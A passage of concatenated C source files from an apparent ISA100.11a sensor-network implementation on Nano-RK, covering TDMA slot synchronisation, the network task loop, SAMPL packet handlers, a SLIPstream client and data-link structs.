// printf("TX:%d\r\n",tx_slot_from_join[i]);
}
}
for(i=0;i<4;i++){ // set rx slots
if(isa_rfRxInfo.pPayload[DAUX_INDEX+23+i]==0)
break;
else{
isa_tdma_rx_mask |= ((uint32_t) 1) << isa_rfRxInfo.pPayload[DAUX_INDEX+23+i];
isa_sched[isa_rfRxInfo.pPayload[DAUX_INDEX+23+i]] = 1;
}
}
nrk_event_signal(SIG(isa_rx_pkt_signal));
break;
}
// }
}
}
_isa_join_ok=1;
isa_rx_pkt_release();
return _isa_join_ok;
}
*/
int8_t isa_join_ready()
{
if (_isa_join_ok == 1)
return NRK_OK;
else
return NRK_ERROR;
}
/** FIXME this is only a temporary function need to be more specified
* _isa_init_sync()
*
* This function is used for join process.
* A node that wants to join the network would keep listening first
* and set up first sync.
*
* Return: _isa_sync_ok.
*/
uint8_t _isa_init_sync ()
{
int8_t n;
uint16_t timeout;
uint16_t timer;
uint8_t tdma_start_tick;
uint8_t battery_save_cnt;
uint8_t last_nrk_tick;
uint8_t tmp_nrk_prev_timer_val;
//volatile uint16_t sfd_start_time;
//printf("%d,%d\n\r",isa_param.channel,global_slot);
// DISABLE_GLOBAL_INT ();
timer=0;
battery_save_cnt=0;
while(1)
{
// printf("Channel%d ,channelINdex %d\r\n",currentChannel,channelIndex);
//printf("Init sync \r\n");
isa_rfRxInfo.pPayload[DHDR_INDEX]=1; //configDHDR(0); This will have to change
//isa_rfRxInfo.pPayload[SLOT_INDEX]=global_slot;
#ifdef LED_DEBUG
nrk_led_set(1);
#endif
rf_set_rx (&isa_rfRxInfo, isa_param.channel); // sets rx buffer and channel
rf_polling_rx_on ();
n = 0;
_isa_sync_ok = 0;
last_nrk_tick=0; // should be 0 going in
//_nrk_prev_timer_val=250;
_nrk_set_next_wakeup(250);
_nrk_os_timer_set(0);
//timeout=200;
while ((n = rf_rx_check_sfd()) == 0) {
// every OS tick
if(last_nrk_tick!=_nrk_os_timer_get()) {
last_nrk_tick=_nrk_os_timer_get();
timer++;
if(timer>ISA_TOKEN_TIMEOUT){
timer=0;
break;
}
}
}
//printf("3 \n");
_nrk_high_speed_timer_reset();
// capture SFD transition with high speed timer
//sfd_start_time=_nrk_high_speed_timer_get();
tdma_start_tick=_nrk_os_timer_get();
timeout = tdma_start_tick+4;
// an interrupt could happen in here and mess things up
if (n != 0) {
n = 0;
// Packet on its way
while ((n = rf_polling_rx_packet (false,128)) == 0) {
// printf("4 \n");
if (_nrk_os_timer_get () > timeout)
{
//nrk_kprintf( PSTR("Pkt timed out\r\n") );
break; // huge timeout as failsafe
}
}
}
rf_rx_off ();
//printf("5 \n");
if (n == 1 /*&& isa_rfRxInfo.length>0*/) {
int DHDR = isa_rfRxInfo.pPayload[DHDR_INDEX];
// if(isa_rfRxInfo.pPayload[SRC_INDEX]==isa_clk_src_id && isa_rfRxInfo.pPayload[DEST_INDEX] == dmo.dlAddress){//change
//if(isa_rfRxInfo.pPayload[SRC_INDEX]==isa_clk_src_id && DHDR & (1<<4)){
if(isa_rfRxInfo.pPayload[SRC_INDEX]==isa_clk_src_id && DHDR &(1<<4)){
// CRC and checksum passed
isa_rx_data_ready = 1;
//rtl_rx_slot = 0;
//DHDR = (volatile)isa_rfRxInfo.pPayload[DHDR_INDEX];
global_slot = (volatile)isa_rfRxInfo.pPayload[SLOT_INDEX];
nrk_led_toggle(GREEN_LED);
putchar ('i');
// nrk_event_signal(SIG(isa_rx_pkt_signal));
break;
//
}
}
}
#ifdef LED_DEBUG
nrk_led_clr(1);
#endif
//printf("os_timer=%d\r\n",_nrk_os_itimer_get());
#ifdef INIT_SYNC
nrk_gpio_set(NRK_DEBUG_1);
#endif
_isa_sync_ok = 1;
isa_rx_pkt_release();
tmp_nrk_prev_timer_val=_nrk_prev_timer_val;
_nrk_os_timer_stop();
_nrk_os_timer_reset();
/*
* If I dont do this reset, then the next wakeup is not predictable! Why??
*/
_nrk_set_next_wakeup(10);
_nrk_os_timer_set(7);
nrk_high_speed_timer_wait(0,SFD_TO_NEXT_SLOT_TIME);
//_nrk_os_timer_reset();
_nrk_os_timer_start();
//_nrk_prev_timer_val=9;
//printf("%d\n\r", _nrk_os_timer_get());
nrk_cur_task_TCB->next_wakeup = 10;
//printf("%d\n\r",_nrk_prev_timer_val);
// _nrk_high_speed_timer_reset();
// slot_start_time=_nrk_high_speed_timer_get();
#ifdef INIT_SYNC
nrk_gpio_clr(NRK_DEBUG_1);
#endif
return _isa_sync_ok;
}
void isa_nw_task ()
{
uint8_t slot;
uint16_t next_slot_offset = 0;
uint8_t FIRST = 1;
DLMO_LINK * link;
_isa_ready = 0;
// wait for isa ready
do {
nrk_wait_until_next_period ();
}while (_isa_ready == 0);
_isa_ready = 1;
//nrk_gpio_clr(NRK_DEBUG_0);
//nrk_time_get (&last_slot_time);// dont know if it is useful
while (1) {
//putchar('n');
_nrk_high_speed_timer_reset();
slot_start_time = _nrk_high_speed_timer_get();
nrk_gpio_set(NRK_DEBUG_1);
nrk_gpio_clr(NRK_DEBUG_1);
// reset high speed timer and then record the timer value used for calculating offsets
//nrk_time_get (&last_slot_time);// dont know if it is useful
// last_slot = global_slot; //global_slot has been initialized to MAX_ISA_GLOBAL_SLOTS in isa_init()
// if (last_slot > MAX_ISA_GLOBAL_SLOTS)
// last_slot -= (MAX_ISA_GLOBAL_SLOTS+1);
current_global_slot = global_slot;
/* global_slot should be wrapped */
if(global_slot > ISA_SLOTS_PER_FRAME * 3)
{
global_slot = global_slot % ISA_SLOTS_PER_FRAME;
global_cycle++;
}
/*
if (global_slot > MAX_ISA_GLOBAL_SLOTS) {
global_slot -= MAX_ISA_GLOBAL_SLOTS;
global_cycle++;
}
*/
slot = global_slot % ISA_SLOTS_PER_FRAME;
if(_isa_sync_ok == 1){
#ifdef CHANNEL_HOPPING
channelIndex += next_slot_offset;
currentChannel = slottedPattern[(channelIndex)&0x0F];//equivalent to mod by 16
isa_set_channel(currentChannel);
/*
if(slot>=22 && isa_node_mode == ISA_GATEWAY){
slowIndex = slowIndex % 3;
currentChannel = slowPattern[slowIndex];
isa_set_channel(currentChannel);
if(slot>=24)
slowIndex++;
}
*/
//printf("CH:%d SL: %d\r\n",currentChannel,slot);
#endif
//printf("%d,%d\n\r",currentChannel,(channelIndex)&0x0F);
//printf("isa_rx_data_ready:%d\r\n",isa_rx_data_ready);
// if TX slot mask and tx ready, send a packet
#ifdef JOIN_PROCESS
if(slot>=22 && isa_node_mode == ISA_GATEWAY)
isa_tx_data_ready |= ((uint32_t) 1 << slot);
#endif
#ifdef TX_RX_DEBUG
//printf("R\r\n");
// nrk_gpio_set(NRK_DEBUG_0);
#endif
/*
* who is the neighbor that this slot is configured for?
*/
link = findLink(slot);
if(link != NULL){
//what type of link is this
if (link->linkType == RX){
_isa_rx (link, slot);
}
else if (link->linkType == TX_NO_ADV){
_isa_tx(link , slot);
}
else if(link->linkType == ADV){//Added by Vignesh.
_isa_tx(link,slot);
}
//find the highest priority entry in the queue (if any)
//if (transmitEntry = hightestPriorityEntry(neighbor) != NULL){
// _isa_tx(transmitEntry, link);
// }
}
//printf("isa tx slot %d.\n\r",slot);
// printf("TX %d,%d,%d\n\r",currentChannel,(channelIndex)&0x0F,slot);
//printf("tx\n\r");
// _isa_tx (slot);
// previous_tx_slot = slot;
#ifdef HIGH_TIMER_DEBUG
//printf("TX later, high speed timer value is %d.\n\r", _nrk_high_speed_timer_get());
#endif
} else {
///do joining or sync request here
// DHDR = configDHDR(0);
if(isa_node_mode != ISA_GATEWAY){//change
#ifdef JOIN_PROCESS
if(!_isa_join_ok){
_isa_join_process();
}
#endif
DHDRcount = 0; //make send request for time correction
_isa_sync_ok = _isa_init_sync();
//printf("waiting for sync...isa_sync_ok is %d.\n\r",_isa_sync_ok);
}else if (isa_node_mode == ISA_GATEWAY){
_isa_sync_ok = 1;
}
}
if(slot_expired >= EXPIRATION && isa_node_mode != ISA_GATEWAY){
//printf("re-sync\n\r");
_isa_sync_ok = 0;
slot_expired = 0;
global_slot = 0;
next_slot_offset = 0;
resync_times++;
if(isa_id!=1){
channelIndex = isa_clk_src_id;
currentChannel = slottedPattern[channelIndex];
}else{
channelIndex = 0;
currentChannel = slottedPattern[channelIndex];
}
isa_set_channel(currentChannel);
}else{
//printf("Channel%d ,channelINdex %d\r\n",currentChannel,channelIndex);
//printf("global_slot is %d. global cycle is %d.\n\r",global_slot,global_cycle);
next_slot_offset = isa_get_slots_until_next_wakeup (global_slot);
// printf("NOS:%d\n\r",next_slot_offset);
//printf("%d,%d,%d,%d\n\r",_nrk_os_timer_get (),_nrk_get_next_wakeup (),global_slot,next_slot_offset);
global_slot += next_slot_offset;
//nrk_clr_led (1);
#ifdef LED_SLOT_DEBUG
nrk_led_clr(0);
#endif
offsetY = 0;
// printf("%d\n\r",next_slot_offset);
//nrk_gpio_set(NRK_DEBUG_2);
if (txCount % 1000 == 0){
// printf ("PL:%d\r\n",packetsLost);
}
// Check to see if and adv is due if not gateway
if (isa_node_mode!=ISA_GATEWAY){
if (isDiscoveryAlertDue()){
if (sendAdv()== ISA_ERROR){
printIsaError();
}
printf ("AdvSent\r\n");
updateLastSentTime();
setNewDisplay(13, dmo.dlAddress-1);
}
}
nrk_wait_until_next_n_periods (next_slot_offset);
// nrk_gpio_clr(NRK_DEBUG_2);
#ifdef LED_SLOT_DEBUG
nrk_led_set(0);
#endif
//}
//nrk_set_led (1);
// Set last_slot_time to the time of the start of the slot
}
}
}
void isa_task_config ()
{
isa_task.task = isa_nw_task;
nrk_task_set_stk( &isa_task, isa_task_stack, ISA_STACK_SIZE);
isa_task.prio = 20;
isa_task.FirstActivation = TRUE;
isa_task.Type = BASIC_TASK;
isa_task.SchType = PREEMPTIVE;
isa_task.period.secs = 0;
isa_task.period.nano_secs = 10*NANOS_PER_MS;
isa_task.cpu_reserve.secs = 0;
isa_task.cpu_reserve.nano_secs = 0;
isa_task.offset.secs = 0;
isa_task.offset.nano_secs = 0;
nrk_activate_task (&isa_task);
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/code/current/nano-RK-well-sync/projects/SAMPL/pkt_handlers/transducer_pkt.c
#include <globals.h>
#include <../include/sampl.h>
#include <control_pkt.h>
#include <ack_pkt.h>
#include <transducer_pkt.h>
#ifdef NANORK
#include <transducer_handler.h>
#include <nrk.h>
#include <nrk_error.h>
int8_t transducer_generate(SAMPL_UPSTREAM_PKT_T *pkt,SAMPL_DOWNSTREAM_PKT_T *ds_pkt )
{
TRANSDUCER_REPLY_PKT_T r;
TRANSDUCER_CMD_PKT_T p;
ACK_PKT_T a;
uint8_t num_pkts,i,selected,checksum;
uint8_t status;
uint8_t pkt_generated;
pkt_generated=0;
pkt->payload_len=0;
pkt->num_msgs=0;
status=0;
checksum=transducer_cmd_pkt_get(&p, ds_pkt->payload);
if(checksum==p.checksum )
{
for(i=0; i<p.num_msgs; i++ )
{
if(p.msg[i].mac_addr==my_mac || p.msg[i].mac_addr==255 )
{
pkt_generated=1;
// Setup a blank default reply pkt
r.mac_addr=my_mac;
r.len=0;
r.type=0;
r.payload=&(pkt->payload[pkt->payload_len+TRANSDUCER_REPLY_HEADER_SIZE]);
// Call application transducer handler
status=transducer_handler( p.msg[i].key, p.msg[i].value, &r);
if( status==0) pkt->error_code=1;
// Copy header elements into packet
pkt->payload[pkt->payload_len]=r.mac_addr;
pkt->payload[pkt->payload_len+1]=r.type;
pkt->payload[pkt->payload_len+2]=r.len;
// Update new length of packet
pkt->payload_len+=r.len+TRANSDUCER_REPLY_HEADER_SIZE;
pkt->num_msgs++;
pkt->pkt_type=TRANSDUCER_REPLY_PKT;
}
}
}
else
{
pkt_generated=1;
nrk_kprintf( PSTR( "Actuator packet failed checksum\r\n"));
nrk_kprintf( PSTR(" pkt: " ));
printf( "%d",p.checksum );
nrk_kprintf( PSTR(" calc: " ));
printf( "%d\r\n",checksum );
// build NCK reply packet
a.mac_addr=my_mac;
pkt->payload_len = ack_pkt_add( &a, pkt->payload,0);
pkt->num_msgs=1;
pkt->pkt_type=ACK_PKT;
pkt->error_code=1; // set error type for NCK
}
if(pkt_generated==0)
{
pkt->pkt_type=EMPTY_PKT;
pkt->num_msgs=0;
pkt->payload_len=0;
}
return NRK_OK;
}
int8_t transducer_p2p_generate(SAMPL_PEER_2_PEER_PKT_T *pkt)
{
ACK_PKT_T p;
p.mac_addr=my_mac;
pkt->payload_len = ack_pkt_add( &p, pkt->payload,0);
return NRK_OK;
}
int8_t transducer_aggregate(SAMPL_UPSTREAM_PKT_T *in, SAMPL_UPSTREAM_PKT_T *out)
{
uint8_t len,i,j,k,dup;
TRANSDUCER_REPLY_PKT_T p1, p2;
for(i=0; i<in->num_msgs; i++ )
{
dup=0;
// get next ping packet to compare against current outgoing list
transducer_reply_pkt_get( &p1, in->payload, i );
for(k=0; k<out->num_msgs; k++ )
{
// get packet from outgoing list and compare against incomming packet
transducer_reply_pkt_get( &p2, out->payload, k );
if(p1.mac_addr==p2.mac_addr && p1.type==p2.type) dup=1;
}
if(dup==0)
{
// if packet is unique, add to outgoing packet
//out->payload_len=transducer_reply_pkt_add( &p1, out->payload, out->num_msgs );
len=transducer_reply_pkt_add( &p1, out->payload, out->num_msgs );
if(len>0)
{
out->payload_len=len;
out->num_msgs++;
}
else
{
// Set overflow error code
out->error_code=1;
}
}
}
return NRK_OK;
}
#else
#define my_mac 0
#define RF_MAX_PAYLOAD_SIZE 128
#endif
uint8_t transducer_cmd_pkt_get( TRANSDUCER_CMD_PKT_T *p, uint8_t *buf)
{
uint8_t i,c;
// 1 byte offset for number of messages
p->checksum=buf[0];
p->num_msgs=buf[1];
c=buf[1];
p->msg=(TRANSDUCER_MSG_T *) &buf[2];
for(i=0; i<p->num_msgs*sizeof(TRANSDUCER_MSG_T); i++ )
c+=buf[2+i];
return c;
}
uint8_t transducer_cmd_pkt_checksum( TRANSDUCER_CMD_PKT_T *p, uint8_t *buf)
{
uint8_t i,c;
c=buf[1];
for(i=0; i<p->num_msgs*3; i++ )
c+=buf[2+i];
p->checksum=c;
buf[0]=c;
}
uint8_t transducer_cmd_pkt_add( TRANSDUCER_CMD_PKT_T *p, uint8_t *buf)
{
uint8_t i;
// pack the number of messages into the payload
buf[1]=p->num_msgs;
// Copy the data to the payload
for(i=0; i<p->num_msgs; i++ )
{
buf[2+(i*3)]=p->msg[i].mac_addr;
buf[2+(i*3)+1]=p->msg[i].key;
buf[2+(i*3)+2]=p->msg[i].value;
}
// return the size of the packet (number of messages + 2 header bytes)
return (p->num_msgs*sizeof(TRANSDUCER_MSG_T)+2);
}
uint8_t transducer_reply_pkt_add( TRANSDUCER_REPLY_PKT_T *p, uint8_t *buf, uint8_t index)
{
uint8_t i,j,next_pkt;
next_pkt=0;
for(i=0; i<index; i++ )
{
// index of next packet plus the length of the packet and header
next_pkt+=buf[next_pkt+2]+TRANSDUCER_REPLY_HEADER_SIZE;
}
if(next_pkt+p->len > MAX_PKT_PAYLOAD ) return 0;
buf[next_pkt]=p->mac_addr;
buf[next_pkt+1]=p->type;
buf[next_pkt+2]=p->len;
next_pkt+=TRANSDUCER_REPLY_HEADER_SIZE;
for(i=0; i<p->len; i++ )
buf[next_pkt+i]=p->payload[i];
return (next_pkt+p->len);
}
uint8_t transducer_reply_pkt_get( TRANSDUCER_REPLY_PKT_T *p, uint8_t *buf, uint8_t index )
{
uint8_t i,next_pkt;
next_pkt=0;
for(i=0; i<index; i++ )
{
next_pkt+=buf[next_pkt+2]+TRANSDUCER_REPLY_HEADER_SIZE;
}
p->mac_addr=buf[next_pkt];
p->type=buf[next_pkt+1];
p->len=buf[next_pkt+2];
p->payload=&(buf[next_pkt+3]);
}
<file_sep>/ISA100.11a-master/ISA100_11a/11-2/current/nano-RK-well-sync/projects/SAMPL/client_core/.svn/text-base/p2p_handler.c.svn-base
#include "p2p_handler.h"
#include <globals.h>
#include <nrk.h>
#include <nrk_eeprom.h>
#include <ping_pkt.h>
#include <../include/sampl.h>
#ifdef PHOENIX
#include "./phoenix/phoenix.h"
#endif
PING_PKT_T p;
// Input:
// p2p_pkt_in
// Output:
// p2p_pkt_out
uint8_t handle_peer_2_peer_pkt(SAMPL_PEER_2_PEER_PKT_T *p2p_pkt_in, SAMPL_PEER_2_PEER_PKT_T *p2p_pkt_out)
{
uint8_t i, mode, len;
uint16_t addr;
// This function is responsible for creating the
// data that is sent back up the tree.
#ifdef DEBUG_TXT
nrk_kprintf (PSTR ("Create P2P reply: "));
#endif
// Copy header information for reply packet
p2p_pkt_out->pkt_type = p2p_pkt_in->pkt_type;
p2p_pkt_out->ctrl_flags = p2p_pkt_in->ctrl_flags;
p2p_pkt_out->seq_num = p2p_pkt_in->seq_num;
p2p_pkt_out->ttl = p2p_pkt_in->ttl-1;
p2p_pkt_out->priority = p2p_pkt_in->priority;
p2p_pkt_out->ack_retry= p2p_pkt_in->ack_retry;
p2p_pkt_out->check_rate= p2p_pkt_in->check_rate;
p2p_pkt_out->subnet_mac[0] = p2p_pkt_in->subnet_mac[0];
p2p_pkt_out->subnet_mac[1] = p2p_pkt_in->subnet_mac[1];
p2p_pkt_out->subnet_mac[2] = p2p_pkt_in->subnet_mac[2];
p2p_pkt_out->src_mac = p2p_pkt_in->src_mac;
p2p_pkt_out->dst_mac = p2p_pkt_in->dst_mac;
p2p_pkt_out->last_hop_mac = my_mac;
p2p_pkt_out->next_hop_mac = (route_table_get(p2p_pkt_in->dst_mac) & 0xff);
if(admin_debug_flag==1 && (p2p_pkt_in->ctrl_flags & DEBUG_FLAG) !=0 )
{
nrk_kprintf( PSTR( "Route Option: " ));
if(p2p_pkt_out->next_hop_mac==0xff) nrk_kprintf( PSTR("Flooding\r\n") );
nrk_kprintf( PSTR("Set Route\r\n" ));
printf( "0x%x%x: ",my_subnet_mac[0],my_mac);
nrk_kprintf( PSTR(" p2p_pkt ") );
}
// If the packet is a broadcast or direct to my node
// Packets that are directed towards a node without routing data set
// next_hop_mac to 255.
if(p2p_pkt_in->dst_mac==255 || p2p_pkt_in->dst_mac==my_mac )
{
if(admin_debug_flag==1 && (p2p_pkt_in->ctrl_flags & DEBUG_FLAG) !=0 )
nrk_kprintf( PSTR("for me\r\n") );
switch (p2p_pkt_in->pkt_type) {
case PING_PKT:
// setup 1-hop reply (change below for packet specific mods)
p2p_pkt_out->ctrl_flags = 0;
p2p_pkt_out->ttl = 1;
p2p_pkt_out->subnet_mac[0] = my_subnet_mac[0];
p2p_pkt_out->subnet_mac[1] = my_subnet_mac[1];
p2p_pkt_out->subnet_mac[2] = my_subnet_mac[2];
p2p_pkt_out->src_mac = my_mac;
p2p_pkt_out->dst_mac = p2p_pkt_in->src_mac;
p2p_pkt_out->next_hop_mac = p2p_pkt_in->src_mac;
ping_p2p_generate(p2p_pkt_out);
break;
case DATA_STORAGE_PKT:
// setup 1-hop reply (change below for packet specific mods)
p2p_pkt_out->ctrl_flags = 0;
p2p_pkt_out->ttl = 1;
p2p_pkt_out->subnet_mac[0] = my_subnet_mac[0];
p2p_pkt_out->subnet_mac[1] = my_subnet_mac[1];
p2p_pkt_out->subnet_mac[2] = my_subnet_mac[2];
p2p_pkt_out->src_mac = my_mac;
p2p_pkt_out->dst_mac = p2p_pkt_in->src_mac;
p2p_pkt_out->next_hop_mac = p2p_pkt_in->src_mac;
eeprom_storage_p2p_generate(p2p_pkt_in, p2p_pkt_out );
break;
#ifdef PHOENIX
case WIRELESS_UPDATE_PKT:
#ifdef DEBUG_TXT
nrk_kprintf (PSTR ("Wireless Update Packet\r\n"));
#endif
// Don't reply if packet is not encrypted
if((p2p_pkt_in->ctrl_flags & ENCRYPT) == 0 ) return;
phoenix_wireless_update();
// This function reboots, it never returns...
break;
#endif
// Just copy the packet and route as needed
default:
#ifdef DEBUG_TXT
nrk_kprintf( PSTR( "Got UNKOWN pkt, forwarding\r\n" ));
#endif
// No clue what this packet is, so just forward it
for(i=0; i<p2p_pkt_in->payload_len; i++ )
p2p_pkt_out->payload[i]=p2p_pkt_in->payload[i];
p2p_pkt_out->payload_len=p2p_pkt_in->payload_len;
}
}else if(p2p_pkt_out->ttl>0)
{
// This packet should be forwarded
if(admin_debug_flag==1 && (p2p_pkt_in->ctrl_flags & DEBUG_FLAG) !=0 )
nrk_kprintf( PSTR("forward\r\n") );
// If the packet isn't for my handler, just copy it for forwarding
// Routing should have been correctly set above
for(i=0; i<p2p_pkt_in->payload_len; i++ )
p2p_pkt_out->payload[i]=p2p_pkt_in->payload[i];
p2p_pkt_out->payload_len=p2p_pkt_in->payload_len;
} else
{
// This packet is junk, don't reply at all
p2p_pkt_out->pkt_type = EMPTY_PKT;
return 0;
}
return 1;
}
<file_sep>/ISA100.11a-master/ISA100_11a/code/current/nano-RK-well-sync/src/net/isa/dmo.h
/*
* dmo.h
*
* Created on: Nov 15, 2012
* Author: azriel
* DEVICE MANAGEMENT OBJECT
*/
#ifndef DMO_H_
#define DMO_H_
typedef struct {
uint16_t dlAddress;
} DMO;
#endif /* DMO_H_ */
<file_sep>/ISA100.11a-master/ISA100_11a/code/current/nano-RK-well-sync/tools/SLIPstream/SLIPstream-client/main.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <slipstream.h>
#define NONBLOCKING 0
#define BLOCKING 1
#define MM 17
void meta_file_generator(char *buf);
int main (int argc, char *argv[])
{
char buffer1[48];
char buffer2[MM];
//unsigned char buf[3];
int v,cnt,i;
if (argc != 3) {
printf ("Usage: server port\n");
exit (1);
}
v=slipstream_open(argv[1],atoi(argv[2]),NONBLOCKING);
sprintf (buffer1, "This is a sample slip string: Count %d\n", cnt);
v=slipstream_send(buffer1,strlen(buffer1)+1);
if (v == 0) printf( "Error sending\n" );
//cnt = 0;
//bzero(buffer2,11);
while (1) {
//cnt++;
//sprintf (buffer1, "This is a sample slip string: Count %d\n", cnt);
//v=slipstream_send(buffer1,strlen(buffer1)+1);
//if (v == 0) printf( "Error sending\n" );
v=slipstream_receive( buffer2);
//printf("V:%d",v);
//buffer2[10]='\0';
if (v > 0) {
meta_file_generator(buffer2);
}
// for test
/*else{
buf[0]=0xff;
buf[1]=0xff;
buf[2]=0xff;
meta_file_generator(buf);
}*/
// Pause for 1 second
sleep (1);
}
}
void meta_file_generator(char *buf)
{
FILE * metadata;
int i;
char fileName[10];
char zero_killer=0xaa;
sprintf(fileName, "%d", buf[0]-1);
strcat(fileName, ".txt");
//fileName="test";
metadata = fopen(fileName,"a+");
for(i=1;i<MM;i++){
buf[i] ^= zero_killer;
fputc(buf[i],metadata);
//printf("%d",buf[i]);
}
fclose(metadata);
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/code/current/nano-RK-well-sync/projects/SAMPL/pkt_handlers/.svn/text-base/ping_pkt.c.svn-base
#include <globals.h>
#include <sampl.h>
#include "ping_pkt.h"
#ifdef NANORK
#include <nrk.h>
#include <nrk_error.h>
#else
#define my_mac 0
#define RF_MAX_PAYLOAD_SIZE 128
#endif
#define MAX_MSGS 50
int8_t ping_generate(SAMPL_UPSTREAM_PKT_T *pkt)
{
PING_PKT_T p;
p.mac_addr=my_mac;
pkt->payload_len = ping_pkt_add( &p, pkt->payload,0);
pkt->num_msgs=1;
return NRK_OK;
}
int8_t ping_p2p_generate(SAMPL_PEER_2_PEER_PKT_T *pkt)
{
PING_PKT_T p;
p.mac_addr=my_mac;
pkt->payload_len = ping_pkt_add( &p, pkt->payload,0);
return NRK_OK;
}
int8_t ping_aggregate(SAMPL_UPSTREAM_PKT_T *in, SAMPL_UPSTREAM_PKT_T *out)
{
uint8_t len,i,j,k,dup;
PING_PKT_T p1, p2;
if(in->num_msgs>MAX_MSGS || out->num_msgs>MAX_MSGS )
{
#ifdef NANORK
nrk_kprintf( PSTR("MAX messages exceeded in aggregate!\r\n"));
#endif
return;
}
for(i=0; i<in->num_msgs; i++ )
{
dup=0;
// get next ping packet to compare against current outgoing list
ping_pkt_get( &p1, in->payload, i );
for(k=0; k<out->num_msgs; k++ )
{
// get packet from outgoing list and compare against incomming packet
ping_pkt_get( &p2, out->payload, k );
if(p1.mac_addr==p2.mac_addr) dup=1;
}
if(dup==0)
{
// if packet is unique, add to outgoing packet
out->payload_len=ping_pkt_add( &p1, out->payload, out->num_msgs );
out->num_msgs++;
}
}
return NRK_OK;
}
void ping_pkt_get( PING_PKT_T *p, uint8_t *buf, uint8_t index )
{
p->mac_addr=buf[index*PING_PKT_SIZE];
}
uint8_t ping_pkt_add( PING_PKT_T *p, uint8_t *buf, uint8_t index )
{
if(index*PING_PKT_SIZE>RF_MAX_PAYLOAD_SIZE) return (index*PING_PKT_SIZE);
buf[index*PING_PKT_SIZE]= p->mac_addr;
return ((index+1)*PING_PKT_SIZE);
}
<file_sep>/ISA100.11a-master/ISA100_11a/code/current/nano-RK-well-sync/src/net/isa/isa_messagetypes.h
#ifndef ISAMESSAGETYPES_H
#define ISAMESSAGETYPES_H
#include <dlmo.h>
// ********************************* DAUX Structure ********************************************
typedef struct {
uint8_t adSelection;//DauxType 3 bits, ChMapOv 1 bit, DauxOptSlowHop 1 bit,Reserved 3 bit
//Time Synchronization information
uint32_t DauxTAIsecond;
uint16_t DauxTAIfraction;
//Superframe Information
uint16_t DauxTsDur;
uint16_t DauxChIndex;
uint8_t DauxChBirth;
uint16_t DauxSfPeriod;
uint16_t DauxSfBirth;
uint8_t DauxChRate;
uint16_t DauxChMap;
//Integrity Check
uint16_t IntegrityCheck;
}DLMO_DAUX;
/***************************DROUT (COMPRESSED VARIANT)******************************************/
typedef struct{
/*
* Compress. If this value is set to 1, the compressed variant of the DROUT format shall be
used.
• Priority. This shall be set to the DPDU’s 4-bit priority.
• DlForwardLimit and DlForwardLimitExt (forwarding limit) limit the number of times that a
DPDU may be forwarded within a DL subnet. If the forwarding limit is less than 7, the
value shall be transmitted in DlForwardLimit and DlForwardLimitExt shall be elided. If the
forwarding limit is greater than or equal to 7, DlForwardLimit shall be transmitted as 7, and
the forwarding limit shall be transmitted in DlForwardLimitExt.
*
*/
uint8_t info; // Compress (1) Priority (4) DlForwardLimit (3)
uint8_t DlForwardLimitExt;
/*
* GraphID (8 bits). GraphIDs compliant with this standard are 12-bit unsigned integers. In
the common case where the route is a single graph ID in the range of 1-255, the
compressed variant of the DROUT sub-header shall be used. Additionally, the
compressed variant is used in single-hop source routing, wherein GraphID=0 shall indicate
that the destination is one hop away. Since the single hop destination address can be
found in the MHR, it does not need to be repeated in DROUT. GraphID=0 shall be used
during the join process for addressing to and from a neighboring proxy, and is the only
way in this standard to indicate a 64-bit destination address in DROUT.
*
*/
uint8_t GraphId;
}DLMO_DROUT;
/*
* Thoughts on graph
*
* One we get the link, check the graph type. If graph type is 0, do what we were doing till now(later on-provided a neighbor is configured)
* Else if graph type is type is 1 , then link is only for a graph. Find the neighbor (again oldest and highest priority)
* that is in the queue and whose DROUT header specifies this graph. It should somehow store the number of tries it has had.
* Based on this number, we select the neighbor to transmit to. If the tries exceed some number, remove from the queue.
* If there is no one with this graph in the queue, then just do that normal sending to a neighbor (only if graph type is 2)
*
*/
/*
* Following are the message types that will go inside the payload
* I am defining my own message types because they are a part of the
* Application layer and this projects implementation is concerned with
* data link layer implementation. These messages should gradually be
* substituted by ISA complaint message types
*
*/
typedef enum{
NEIGHBOR_TABLE_REPORT,
DUMMY_PAYLOAD,
ADD_NEIGHBOR,
ADD_GRAPH,
ADD_LINK,
FLUSH_CANDIDATE_TABLE
} message_type;
typedef struct {
uint8_t numberOfNeighbors; //can be an neighbor table report, or some other command
uint8_t candidate;
}NEIGHBOR_TABLE;
typedef struct {
uint8_t type; //can be an neighbor table report, or some other command
uint8_t data;
}MESSAGE;
typedef struct { // This structure will be used to send and receive neighbor configuration information from uart
uint16_t neighborId;
}CONFIG_NEIGHBOR;
typedef struct{ // This structure will be used to send and receive graph configuration information from uart
uint8_t graphId;
uint8_t neighborCount;
uint16_t neigh1;
uint16_t neigh2;
uint16_t neigh3;
}CONFIG_GRAPH;
typedef struct {// This structure will be used to send and receive link configuration information from uart
uint8_t slotNumber;
uint16_t neighborId;
uint8_t graphId;
uint8_t linkType;
uint8_t graphType;
}CONFIG_LINK;
#endif
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/nano-RK-well-sync/src/net/isa/dlmo.c
/******************************************************************************
* Nano-RK, a real-time operating system for sensor networks.
* Copyright (C) 2007, Real-Time and Multimedia Lab, Carnegie Mellon University
* All rights reserved.
*
* This is the Open Source Version of Nano-RK included as part of a Dual
* Licensing Model. If you are unsure which license to use please refer to:
* http://www.nanork.org/nano-RK/wiki/Licensing
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, version 2.0 of the License.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
* Contributing Authors (specific to this file):
* <NAME>
* <NAME>
*******************************************************************************/
//#include <rtl_debug.h>
#include <include.h>
#include <ulib.h>
#include <avr/sleep.h>
#include <avr/wdt.h>
#include <avr/eeprom.h>
#include <stdio.h>
#include <avr/interrupt.h>
#include <nrk.h>
#include <nrk_events.h>
#include <nrk_timer.h>
#include <nrk_error.h>
//#include <rtl_defs.h>
#include <stdlib.h>
#include <isa_error.h>
#include <dlmo.h>
//********************** Global variables*************************************
DLMO_LINK dlmoLink[DLMO_LINK_MAX_COUNT];
DLMO_NEIGHBOR dlmoNeighbor[DLMO_NEIGHBOR_MAX_COUNT];
